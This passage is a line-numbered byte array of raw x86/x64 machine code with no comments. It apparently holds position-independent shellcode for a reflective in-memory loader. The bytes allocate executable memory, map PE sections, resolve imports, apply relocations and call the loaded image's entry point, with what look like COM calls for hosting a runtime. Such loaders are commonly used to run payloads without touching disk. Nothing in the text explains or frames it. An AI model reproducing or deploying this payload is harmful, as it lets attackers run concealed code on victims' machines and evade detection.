338 0x00, 0x8b, 0x0a, 0x50, 0x52, 0xff, 0x11, 0x85, 0xc0, 0x0f, 0x88, 0xb5,
339 0x00, 0x00, 0x00, 0x83, 0x64, 0x24, 0x20, 0x00, 0x8b, 0x85, 0x10, 0x19,
340 0x00, 0x00, 0x89, 0x44, 0x24, 0x1c, 0x8d, 0x44, 0x24, 0x1c, 0x50, 0x6a,
341 0x01, 0x6a, 0x11, 0xff, 0x53, 0x58, 0x8b, 0xf8, 0x85, 0xff, 0x0f, 0x84,
342 0x90, 0x00, 0x00, 0x00, 0x8b, 0x57, 0x0c, 0x33, 0xc0, 0x8b, 0xc8, 0x39,
343 0x85, 0x14, 0x19, 0x00, 0x00, 0x72, 0x2d, 0x77, 0x08, 0x39, 0x85, 0x10,
344 0x19, 0x00, 0x00, 0x76, 0x23, 0x33, 0xdb, 0x8a, 0x84, 0x29, 0x18, 0x19,
345 0x00, 0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b, 0x9d, 0x14, 0x19, 0x00, 0x00,
346 0x72, 0xed, 0x77, 0x08, 0x3b, 0x8d, 0x10, 0x19, 0x00, 0x00, 0x72, 0xe3,
347 0x8b, 0x5c, 0x24, 0x28, 0x8b, 0x4e, 0x10, 0x8d, 0x46, 0x14, 0x50, 0x57,
348 0x51, 0x8b, 0x11, 0xff, 0x92, 0xb4, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x1b,
349 0xc0, 0x33, 0xd2, 0x40, 0x8b, 0xca, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x47,
350 0x0c, 0x39, 0x95, 0x14, 0x19, 0x00, 0x00, 0x72, 0x27, 0x77, 0x08, 0x39,
351 0x95, 0x10, 0x19, 0x00, 0x00, 0x76, 0x1d, 0x88, 0x94, 0x29, 0x18, 0x19,
352 0x00, 0x00, 0x88, 0x14, 0x08, 0x41, 0x3b, 0x95, 0x14, 0x19, 0x00, 0x00,
353 0x72, 0xed, 0x77, 0x08, 0x3b, 0x8d, 0x10, 0x19, 0x00, 0x00, 0x72, 0xe3,
354 0x57, 0xff, 0x53, 0x64, 0x8b, 0x44, 0x24, 0x10, 0x5f, 0x5e, 0x5d, 0x5b,
355 0x83, 0xc4, 0x14, 0xc3, 0x83, 0x27, 0x00, 0xe9, 0xcc, 0xfe, 0xff, 0xff,
356 0x89, 0x3e, 0xe9, 0xc7, 0xfe, 0xff, 0xff, 0x33, 0xff, 0x8d, 0x46, 0x08,
357 0x50, 0x8d, 0x83, 0x5c, 0x04, 0x00, 0x00, 0x50, 0x8d, 0x83, 0x4c, 0x04,
358 0x00, 0x00, 0x50, 0x57, 0x57, 0xff, 0x93, 0xa0, 0x00, 0x00, 0x00, 0x85,
359 0xc0, 0x0f, 0x89, 0xab, 0xfe, 0xff, 0xff, 0x89, 0x7e, 0x08, 0x33, 0xc0,
360 0xeb, 0xbe, 0x83, 0xec, 0x6c, 0x53, 0x8b, 0x5c, 0x24, 0x74, 0x33, 0xc0,
361 0x55, 0x56, 0x57, 0x8d, 0x7c, 0x24, 0x3c, 0x33, 0xed, 0x21, 0x6c, 0x24,
362 0x14, 0x8d, 0xb3, 0x48, 0x07, 0x00, 0x00, 0xab, 0xab, 0xab, 0xab, 0x33,
363 0xc0, 0x66, 0x89, 0x44, 0x24, 0x10, 0x40, 0x39, 0x83, 0x0c, 0x05, 0x00,
364 0x00, 0x74, 0x02, 0x8b, 0x36, 0x83, 0x3e, 0x02, 0x0f, 0x85, 0x64, 0x01,
365 0x00, 0x00, 0x8b, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x48, 0x14,
366 0x8d, 0x78, 0x1c, 0x57, 0x51, 0x8b, 0x01, 0xff, 0x50, 0x40, 0x85, 0xc0,
367 0x0f, 0x88, 0x41, 0x01, 0x00, 0x00, 0x8b, 0x07, 0x8d, 0x54, 0x24, 0x14,
368 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x48, 0x85, 0xc0, 0x0f, 0x88, 0x4e,
369 0x02, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x6a, 0x01, 0xff, 0x74,
370 0x24, 0x1c, 0xff, 0x53, 0x68, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x6a, 0x01,
371 0xff, 0x74, 0x24, 0x1c, 0xff, 0x53, 0x6c, 0x8b, 0x44, 0x24, 0x20, 0x2b,
372 0x44, 0x24, 0x24, 0x83, 0xc0, 0x01, 0x0f, 0x84, 0xbc, 0x00, 0x00, 0x00,
373 0x6a, 0x01, 0x6a, 0x00, 0x6a, 0x0c, 0xff, 0x53, 0x5c, 0x8b, 0xe8, 0x33,
374 0xc9, 0x39, 0x8e, 0x04, 0x08, 0x00, 0x00, 0xb8, 0x08, 0x20, 0x00, 0x00,
375 0x66, 0x89, 0x44, 0x24, 0x2c, 0x74, 0x58, 0xff, 0xb6, 0x04, 0x08, 0x00,
376 0x00, 0x51, 0x6a, 0x08, 0xff, 0x53, 0x5c, 0x89, 0x44, 0x24, 0x34, 0x33,
377 0xc0, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x39, 0x86, 0x04, 0x08,
378 0x00, 0x00, 0x76, 0x63, 0xc1, 0xe0, 0x09, 0x05, 0x08, 0x08, 0x00, 0x00,
379 0x03, 0xc6, 0x50, 0xff, 0x53, 0x70, 0x50, 0x8d, 0x84, 0x24, 0x84, 0x00,
380 0x00, 0x00, 0x50, 0xff, 0x74, 0x24, 0x3c, 0xff, 0x53, 0x60, 0x8b, 0x84,
381 0x24, 0x80, 0x00, 0x00, 0x00, 0x40, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00,
382 0x00, 0x3b, 0x86, 0x04, 0x08, 0x00, 0x00, 0x72, 0xcb, 0xeb, 0x2c, 0x6a,
383 0x01, 0x51, 0x6a, 0x08, 0xff, 0x53, 0x5c, 0x83, 0xa4, 0x24, 0x80, 0x00,
384 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x34, 0x8d, 0x44, 0x24, 0x10, 0x50,
385 0xff, 0x53, 0x70, 0x50, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50,
386 0xff, 0x74, 0x24, 0x3c, 0xff, 0x53, 0x60, 0x83, 0xa4, 0x24, 0x80, 0x00,
387 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x8d, 0x84, 0x24, 0x84,
388 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x53, 0x60, 0x83, 0x64, 0x24, 0x44,
389 0x00, 0x8d, 0x54, 0x24, 0x5c, 0x52, 0x33, 0xc0, 0x8d, 0x74, 0x24, 0x40,
390 0x40, 0x66, 0x89, 0x44, 0x24, 0x40, 0x8b, 0x07, 0x55, 0x83, 0xec, 0x10,
391 0x8b, 0xfc, 0x8b, 0x08, 0x50, 0xa5, 0xa5, 0xa5, 0xa5, 0xff, 0x91, 0x94,
392 0x00, 0x00, 0x00, 0x85, 0xed, 0x0f, 0x84, 0x32, 0x01, 0x00, 0x00, 0xff,
393 0x74, 0x24, 0x34, 0xff, 0x53, 0x64, 0x55, 0xff, 0x53, 0x64, 0xe9, 0x22,
394 0x01, 0x00, 0x00, 0x21, 0x2f, 0xe9, 0x1b, 0x01, 0x00, 0x00, 0x8d, 0x86,
395 0x04, 0x04, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, 0xe8, 0x89, 0x6c,
396 0x24, 0x18, 0x85, 0xed, 0x0f, 0x84, 0x06, 0x01, 0x00, 0x00, 0x8d, 0x86,
397 0x04, 0x06, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x89, 0x44, 0x24, 0x1c,
398 0x85, 0xc0, 0x0f, 0x84, 0xe9, 0x00, 0x00, 0x00, 0x8b, 0x8c, 0x24, 0x84,
399 0x00, 0x00, 0x00, 0x8b, 0x51, 0x14, 0x8d, 0x41, 0x18, 0x50, 0x55, 0x52,
400 0x8b, 0x0a, 0x89, 0x44, 0x24, 0x34, 0xff, 0x51, 0x44, 0x8b, 0xf8, 0x85,
401 0xff, 0x0f, 0x88, 0xbe, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x04, 0x08, 0x00,
402 0x00, 0x33, 0xed, 0x85, 0xc0, 0x74, 0x6e, 0x50, 0x55, 0x6a, 0x0c, 0xff,
403 0x53, 0x5c, 0x8b, 0xe8, 0x85, 0xed, 0x74, 0x61, 0x83, 0xa4, 0x24, 0x80,
404 0x00, 0x00, 0x00, 0x00, 0x83, 0xbe, 0x04, 0x08, 0x00, 0x00, 0x00, 0x76,
405 0x50, 0x33, 0xc0, 0xc1, 0xe0, 0x09, 0x05, 0x08, 0x08, 0x00, 0x00, 0x03,
406 0xc6, 0x50, 0xff, 0x53, 0x70, 0x6a, 0x08, 0x89, 0x44, 0x24, 0x58, 0x58,
407 0x66, 0x89, 0x44, 0x24, 0x4c, 0x8d, 0x44, 0x24, 0x4c, 0x50, 0x8d, 0x84,
408 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x53, 0x60, 0x8b, 0xf8,
409 0x85, 0xff, 0x79, 0x06, 0x55, 0xff, 0x53, 0x64, 0x33, 0xed, 0x8b, 0x84,
410 0x24, 0x80, 0x00, 0x00, 0x00, 0x40, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00,
411 0x00, 0x3b, 0x86, 0x04, 0x08, 0x00, 0x00, 0x72, 0xb2, 0x85, 0xff, 0x78,
412 0x3c, 0x8b, 0x44, 0x24, 0x28, 0x8d, 0x54, 0x24, 0x6c, 0x52, 0x55, 0x83,
413 0xec, 0x10, 0x8d, 0x74, 0x24, 0x54, 0x8b, 0x00, 0x8b, 0xfc, 0x6a, 0x00,
414 0x8b, 0x08, 0xa5, 0x68, 0x18, 0x01, 0x00, 0x00, 0xa5, 0xa5, 0xa5, 0x8b,
415 0x74, 0x24, 0x3c, 0x56, 0x50, 0xff, 0x91, 0xe4, 0x00, 0x00, 0x00, 0x85,
416 0xed, 0x74, 0x04, 0x55, 0xff, 0x53, 0x64, 0x8b, 0x6c, 0x24, 0x18, 0xeb,
417 0x08, 0x8b, 0x6c, 0x24, 0x18, 0x8b, 0x74, 0x24, 0x1c, 0x56, 0xff, 0x53,
418 0x74, 0x55, 0xff, 0x53, 0x74, 0x33, 0xc0, 0x40, 0x5f, 0x5e, 0x5d, 0x5b,
419 0x83, 0xc4, 0x6c, 0xc3, 0x81, 0xec, 0xdc, 0x00, 0x00, 0x00, 0xb8, 0x01,
420 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x31, 0xc0, 0x48, 0x79, 0x53,
421 0x55, 0x8b, 0xac, 0x24, 0xe8, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x4c,
422 0x89, 0x44, 0x24, 0x54, 0x89, 0x44, 0x24, 0x5c, 0x83, 0xbd, 0x0c, 0x05,
423 0x00, 0x00, 0x01, 0x89, 0x44, 0x24, 0x64, 0x89, 0x44, 0x24, 0x6c, 0x89,
424 0x84, 0x24, 0xa8, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xc0, 0x00, 0x00,
425 0x00, 0x89, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xd0,
426 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x8d, 0x85,
427 0x48, 0x07, 0x00, 0x00, 0x57, 0xc7, 0x44, 0x24, 0x30, 0x1b, 0x8b, 0x44,
428 0x24, 0xc7, 0x44, 0x24, 0x34, 0x04, 0x8b, 0x4c, 0x24, 0xc7, 0x44, 0x24,
429 0x38, 0x08, 0x8b, 0x54, 0x24, 0xc7, 0x44, 0x24, 0x3c, 0x0c, 0x52, 0x81,
430 0xc2, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x02, 0x00, 0x00, 0xc7, 0x44, 0x24,
431 0x44, 0x83, 0xe9, 0x01, 0x75, 0xc7, 0x44, 0x24, 0x48, 0xf4, 0xff, 0xd0,
432 0xc3, 0xc7, 0x44, 0x24, 0x4c, 0x48, 0x81, 0xec, 0x48, 0xc7, 0x44, 0x24,
433 0x54, 0x89, 0xac, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x5c, 0x89, 0x9c, 0x24,
434 0x38, 0xc7, 0x44, 0x24, 0x64, 0x89, 0xbc, 0x24, 0x20, 0xc7, 0x44, 0x24,
435 0x6c, 0x89, 0xb4, 0x24, 0x28, 0xc7, 0x44, 0x24, 0x74, 0x89, 0xe6, 0x48,
436 0x89, 0xc7, 0x44, 0x24, 0x78, 0xcf, 0xb8, 0x00, 0x02, 0xc7, 0x44, 0x24,
437 0x7c, 0x00, 0x00, 0x4c, 0x89, 0xc7, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00,
438 0xc1, 0x48, 0x8d, 0x14, 0xc7, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x01,
439 0x4c, 0x8d, 0x04, 0xc7, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x02, 0x4d,
440 0x8d, 0x0c, 0xc7, 0x84, 0x24, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x49, 0x8d,
441 0x1c, 0xc7, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x01, 0x48, 0x89, 0x9c,
442 0xc7, 0x84, 0x24, 0x94, 0x00, 0x00, 0x00, 0x24, 0x00, 0x01, 0x00, 0xc7,
443 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x00, 0x48, 0x01, 0xc3, 0xc7, 0x84,
444 0x24, 0x9c, 0x00, 0x00, 0x00, 0x48, 0x89, 0x9c, 0x24, 0xc7, 0x84, 0x24,
445 0xa0, 0x00, 0x00, 0x00, 0x08, 0x01, 0x00, 0x00, 0xc7, 0x84, 0x24, 0xa4,
446 0x00, 0x00, 0x00, 0x48, 0x01, 0xc3, 0x48, 0xc7, 0x84, 0x24, 0xa8, 0x00,
447 0x00, 0x00, 0x89, 0x9c, 0x24, 0x10, 0xc7, 0x84, 0x24, 0xb0, 0x00, 0x00,
448 0x00, 0x01, 0xc3, 0x48, 0x89, 0xc7, 0x84, 0x24, 0xb4, 0x00, 0x00, 0x00,
449 0x9c, 0x24, 0x18, 0x01, 0xc7, 0x84, 0x24, 0xb8, 0x00, 0x00, 0x00, 0x00,
450 0x00, 0xff, 0xd7, 0xc7, 0x84, 0x24, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x89,
451 0xf4, 0x48, 0xc7, 0x84, 0x24, 0xc0, 0x00, 0x00, 0x00, 0x8b, 0xb4, 0x24,
452 0x28, 0xc7, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x8b, 0xbc, 0x24, 0x20,
453 0xc7, 0x84, 0x24, 0xd0, 0x00, 0x00, 0x00, 0x8b, 0x9c, 0x24, 0x38, 0xc7,
454 0x84, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x8b, 0xac, 0x24, 0x30, 0xc7, 0x84,
455 0x24, 0xe0, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x48, 0x01, 0xc7, 0x84, 0x24,
456 0xe4, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc3, 0x00, 0x89, 0x44, 0x24, 0x14,
457 0x74, 0x06, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x14, 0x8b, 0xb8, 0x54, 0x19,
458 0x00, 0x00, 0x05, 0x18, 0x19, 0x00, 0x00, 0x03, 0xf8, 0x89, 0x44, 0x24,
459 0x10, 0x33, 0xdb, 0x89, 0x7c, 0x24, 0x18, 0x53, 0xff, 0x55, 0x38, 0x66,
460 0x8b, 0x4f, 0x04, 0x89, 0x44, 0x24, 0x28, 0x8b, 0x50, 0x3c, 0x66, 0x3b,
461 0x4c, 0x02, 0x04, 0x0f, 0x85, 0x80, 0x02, 0x00, 0x00, 0x56, 0x6a, 0x40,
462 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00, 0x10, 0x00, 0x00, 0x50, 0x89,
463 0x44, 0x24, 0x28, 0x8b, 0x47, 0x50, 0x03, 0xc1, 0x50, 0x53, 0xff, 0x55,
464 0x3c, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0x59, 0x02, 0x00, 0x00, 0x0f,
465 0xb7, 0x5f, 0x14, 0x33, 0xc0, 0x83, 0x64, 0x24, 0x10, 0x00, 0x83, 0xc3,
466 0x2c, 0x66, 0x3b, 0x47, 0x06, 0x73, 0x37, 0x8b, 0x6c, 0x24, 0x14, 0x03,
467 0xdf, 0xff, 0x73, 0xfc, 0x8b, 0x03, 0x03, 0xc5, 0x50, 0x8b, 0x43, 0xf8,
468 0x03, 0xc6, 0x50, 0xe8, 0xa1, 0x07, 0x00, 0x00, 0x8b, 0x4c, 0x24, 0x1c,
469 0x8d, 0x5b, 0x28, 0x0f, 0xb7, 0x47, 0x06, 0x83, 0xc4, 0x0c, 0x41, 0x89,
470 0x4c, 0x24, 0x10, 0x3b, 0xc8, 0x72, 0xd6, 0x8b, 0xac, 0x24, 0xf0, 0x00,
471 0x00, 0x00, 0x8b, 0x9f, 0x80, 0x00, 0x00, 0x00, 0x03, 0xde, 0x89, 0x5c,
472 0x24, 0x14, 0x8b, 0x43, 0x0c, 0x85, 0xc0, 0x74, 0x68, 0x03, 0xc6, 0x50,
473 0xff, 0x55, 0x30, 0x8b, 0x53, 0x10, 0x89, 0x44, 0x24, 0x28, 0x03, 0xd6,
474 0x8b, 0x03, 0x03, 0xc6, 0x89, 0x54, 0x24, 0x24, 0x89, 0x44, 0x24, 0x10,
475 0x8b, 0x08, 0x85, 0xc9, 0x74, 0x35, 0x8b, 0x5c, 0x24, 0x28, 0x8b, 0xfa,
476 0x8b, 0x55, 0x34, 0x85, 0xc9, 0x79, 0x05, 0x0f, 0xb7, 0xc1, 0xeb, 0x05,
477 0x8d, 0x46, 0x02, 0x03, 0xc1, 0x50, 0x53, 0xff, 0xd2, 0x89, 0x07, 0x83,
478 0xc7, 0x04, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xc0, 0x04, 0x89, 0x44, 0x24,
479 0x10, 0x8b, 0x08, 0x85, 0xc9, 0x75, 0xd5, 0x8b, 0x5c, 0x24, 0x14, 0x8b,
480 0x43, 0x20, 0x83, 0xc3, 0x14, 0x89, 0x5c, 0x24, 0x14, 0x85, 0xc0, 0x75,
481 0x9c, 0x8b, 0x7c, 0x24, 0x1c, 0x8b, 0x9f, 0xa0, 0x00, 0x00, 0x00, 0x8b,
482 0xc6, 0x2b, 0x47, 0x34, 0x03, 0xde, 0x33, 0xc9, 0x89, 0x44, 0x24, 0x1c,
483 0x39, 0x0b, 0x74, 0x64, 0x8d, 0x4b, 0x08, 0xeb, 0x49, 0x0f, 0xb7, 0x01,
484 0x8b, 0xd0, 0x25, 0x00, 0xf0, 0x00, 0x00, 0x89, 0x54, 0x24, 0x10, 0x66,
485 0x3b, 0x44, 0x24, 0x20, 0x75, 0x23, 0x8b, 0xc2, 0x25, 0xff, 0x0f, 0x00,
486 0x00, 0x89, 0x44, 0x24, 0x10, 0x03, 0x03, 0x8b, 0x0c, 0x30, 0x03, 0x4c,
487 0x24, 0x1c, 0x8b, 0x44, 0x24, 0x10, 0x03, 0x03, 0x89, 0x0c, 0x30, 0x8b,
488 0x4c, 0x24, 0x14, 0xeb, 0x0e, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x66, 0x3b,
489 0xd0, 0x0f, 0x83, 0x25, 0x01, 0x00, 0x00, 0x83, 0xc1, 0x02, 0x8b, 0x43,
490 0x04, 0x03, 0xc3, 0x89, 0x4c, 0x24, 0x14, 0x3b, 0xc8, 0x75, 0xaa, 0x83,
491 0x39, 0x00, 0x8b, 0xd9, 0x75, 0x9e, 0x33, 0xc9, 0x8b, 0x5c, 0x24, 0x18,
492 0x83, 0x3b, 0x03, 0x0f, 0x85, 0xf8, 0x00, 0x00, 0x00, 0x8d, 0x93, 0x04,
493 0x06, 0x00, 0x00, 0x66, 0x39, 0x0a, 0x0f, 0x84, 0xd9, 0x00, 0x00, 0x00,
494 0x8b, 0x4f, 0x78, 0x85, 0xc9, 0x0f, 0x84, 0xe5, 0x00, 0x00, 0x00, 0x8b,
495 0x7c, 0x31, 0x18, 0x85, 0xff, 0x0f, 0x84, 0xd9, 0x00, 0x00, 0x00, 0x8b,
496 0x44, 0x31, 0x1c, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x31,
497 0x20, 0x8b, 0x4c, 0x31, 0x24, 0x03, 0xc6, 0x03, 0xce, 0x89, 0x4c, 0x24,
498 0x20, 0x8d, 0x04, 0xb8, 0x83, 0xc0, 0xfc, 0x89, 0x44, 0x24, 0x18, 0x8b,
499 0x00, 0x52, 0x03, 0xc6, 0x50, 0xe8, 0xd8, 0x03, 0x00, 0x00, 0x59, 0x59,
500 0x85, 0xc0, 0x74, 0x1c, 0x8b, 0x44, 0x24, 0x18, 0x83, 0xe8, 0x04, 0x89,
501 0x44, 0x24, 0x18, 0x83, 0xef, 0x01, 0x0f, 0x84, 0x90, 0x00, 0x00, 0x00,
502 0x8d, 0x93, 0x04, 0x06, 0x00, 0x00, 0xeb, 0xd3, 0x8b, 0x44, 0x24, 0x20,
503 0x8b, 0x4c, 0x24, 0x1c, 0x0f, 0xb7, 0x44, 0x78, 0xfe, 0x8b, 0x04, 0x81,
504 0x03, 0xc6, 0x89, 0x44, 0x24, 0x20, 0x74, 0x70, 0x6a, 0x40, 0xb8, 0x00,
505 0x30, 0x00, 0x00, 0x50, 0x68, 0xbc, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x50,
506 0xff, 0x55, 0x3c, 0x8b, 0xf8, 0x85, 0xff, 0x74, 0x57, 0x68, 0xbc, 0x00,
507 0x00, 0x00, 0x8d, 0x44, 0x24, 0x34, 0x50, 0x57, 0xe8, 0xc8, 0x05, 0x00,
508 0x00, 0x8d, 0x83, 0x08, 0x08, 0x00, 0x00, 0x50, 0xff, 0xb3, 0x04, 0x08,
509 0x00, 0x00, 0xff, 0x74, 0x24, 0x34, 0xff, 0xd7, 0x68, 0xbc, 0x00, 0x00,
510 0x00, 0x33, 0xdb, 0x53, 0x57, 0xe8, 0xcb, 0x05, 0x00, 0x00, 0x83, 0xc4,
511 0x24, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x53, 0x57, 0xff, 0x55, 0x40, 0xeb,
512 0x17, 0x8b, 0x47, 0x28, 0x51, 0x6a, 0x01, 0xff, 0x74, 0x24, 0x34, 0x03,
513 0xc6, 0xff, 0xd0, 0xeb, 0x07, 0x8b, 0x47, 0x28, 0x03, 0xc6, 0xff, 0xd0,
514 0x68, 0x00, 0xc0, 0x00, 0x00, 0x33, 0xc0, 0x50, 0x56, 0xff, 0x55, 0x40,
515 0x5e, 0x5f, 0x5d, 0x5b, 0x81, 0xc4, 0xdc, 0x00, 0x00, 0x00, 0xc3, 0x81,
516 0xec, 0xd8, 0x00, 0x00, 0x00, 0x53, 0x8b, 0x9c, 0x24, 0xe0, 0x00, 0x00,
517 0x00, 0x55, 0x56, 0x57, 0x83, 0xbb, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8d,
518 0xb3, 0x48, 0x07, 0x00, 0x00, 0x74, 0x02, 0x8b, 0x36, 0x8b, 0x83, 0x40,
519 0x07, 0x00, 0x00, 0x33, 0xff, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00,
520 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x57, 0xff, 0x53, 0x3c,
521 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0x3f, 0x01, 0x00, 0x00, 0x8b, 0x8e,
522 0x10, 0x19, 0x00, 0x00, 0x03, 0xc9, 0x51, 0x55, 0x6a, 0xff, 0x8d, 0x8e,
523 0x18, 0x19, 0x00, 0x00, 0x51, 0x57, 0x57, 0xff, 0x53, 0x50, 0x8d, 0x44,
524 0x24, 0x44, 0x89, 0x44, 0x24, 0x18, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x53,
525 0xe8, 0x4c, 0xea, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x78, 0x89, 0x44, 0x24,
526 0x2c, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x53, 0xe8, 0xfe, 0xf2, 0xff, 0xff,
527 0x83, 0xc4, 0x10, 0x89, 0x7c, 0x24, 0x20, 0x57, 0x57, 0xff, 0x93, 0xa8,
528 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xc8, 0x00, 0x00, 0x00, 0x8d,
529 0x44, 0x24, 0x10, 0x50, 0x8d, 0x83, 0x9c, 0x04, 0x00, 0x00, 0x50, 0x6a,
530 0x03, 0x57, 0x8d, 0x83, 0x7c, 0x04, 0x00, 0x00, 0x50, 0xff, 0x93, 0xac,
531 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xa4, 0x00, 0x00, 0x00, 0x8b,
532 0x4c, 0x24, 0x10, 0x8d, 0x44, 0x24, 0x14, 0x50, 0x8d, 0x83, 0xbc, 0x04,
533 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12, 0x85, 0xc0, 0x75, 0x77,
534 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x0c, 0x85, 0xc0,
535 0x75, 0x5f, 0x8b, 0x4c, 0x24, 0x10, 0x8d, 0x54, 0x24, 0x18, 0x89, 0x4c,
536 0x24, 0x30, 0x52, 0x51, 0x8b, 0x01, 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x75,
537 0x48, 0x8d, 0x83, 0xcc, 0x03, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b,
538 0x4c, 0x24, 0x10, 0x8b, 0xf8, 0x6a, 0x02, 0x57, 0x51, 0x8b, 0x11, 0xff,
539 0x52, 0x20, 0x57, 0x8b, 0xf0, 0xff, 0x53, 0x74, 0x33, 0xff, 0x85, 0xf6,
540 0x75, 0x23, 0x8b, 0x44, 0x24, 0x14, 0x57, 0x57, 0x57, 0x8b, 0x08, 0x57,
541 0x57, 0x57, 0x57, 0x57, 0x55, 0x50, 0xff, 0x51, 0x14, 0x85, 0xc0, 0x75,
542 0x0c, 0x8b, 0x44, 0x24, 0x10, 0x6a, 0x02, 0x50, 0x8b, 0x08, 0xff, 0x51,
543 0x14, 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b,
544 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x1c, 0x8b, 0x44, 0x24,
545 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b, 0x83, 0x40, 0x07, 0x00,
546 0x00, 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x57, 0x55, 0xe8,
547 0x15, 0x04, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00,
548 0x57, 0x55, 0xff, 0x53, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xd8,
549 0x00, 0x00, 0x00, 0xc3, 0x83, 0xec, 0x0c, 0x53, 0x55, 0x56, 0x8b, 0x74,
550 0x24, 0x1c, 0x57, 0x83, 0xbe, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8d, 0xbe,
551 0x48, 0x07, 0x00, 0x00, 0x74, 0x02, 0x8b, 0x3f, 0x8b, 0x86, 0x40, 0x07,
552 0x00, 0x00, 0x33, 0xed, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0x8d,
553 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x56, 0x3c, 0x8b,
554 0xd8, 0x85, 0xdb, 0x0f, 0x84, 0xd1, 0x00, 0x00, 0x00, 0x8b, 0x8f, 0x10,
555 0x19, 0x00, 0x00, 0x03, 0xc9, 0x51, 0x53, 0x6a, 0xff, 0x8d, 0x8f, 0x18,
556 0x19, 0x00, 0x00, 0x51, 0x55, 0x55, 0xff, 0x56, 0x50, 0x55, 0x55, 0xff,
557 0x96, 0xa8, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0x87, 0x00, 0x00,
558 0x00, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x8d, 0x86, 0xec, 0x04, 0x00, 0x00,
559 0x50, 0x6a, 0x01, 0x55, 0x8d, 0x86, 0xdc, 0x04, 0x00, 0x00, 0x50, 0xff,
560 0x96, 0xac, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x61, 0x8b, 0x44, 0x24,
561 0x10, 0x8d, 0x54, 0x24, 0x20, 0x52, 0x53, 0x50, 0x8b, 0x08, 0xff, 0x91,
562 0x04, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x40, 0x66, 0x39, 0x6c, 0x24,
563 0x20, 0x74, 0x39, 0x8b, 0x4c, 0x24, 0x10, 0x8d, 0x44, 0x24, 0x14, 0x50,
564 0x8d, 0x86, 0xfc, 0x04, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12,
565 0x85, 0xc0, 0x75, 0x20, 0x8b, 0x44, 0x24, 0x10, 0x8d, 0x54, 0x24, 0x18,
566 0x52, 0xff, 0x74, 0x24, 0x18, 0x8b, 0x08, 0x50, 0xff, 0x91, 0x8c, 0x00,
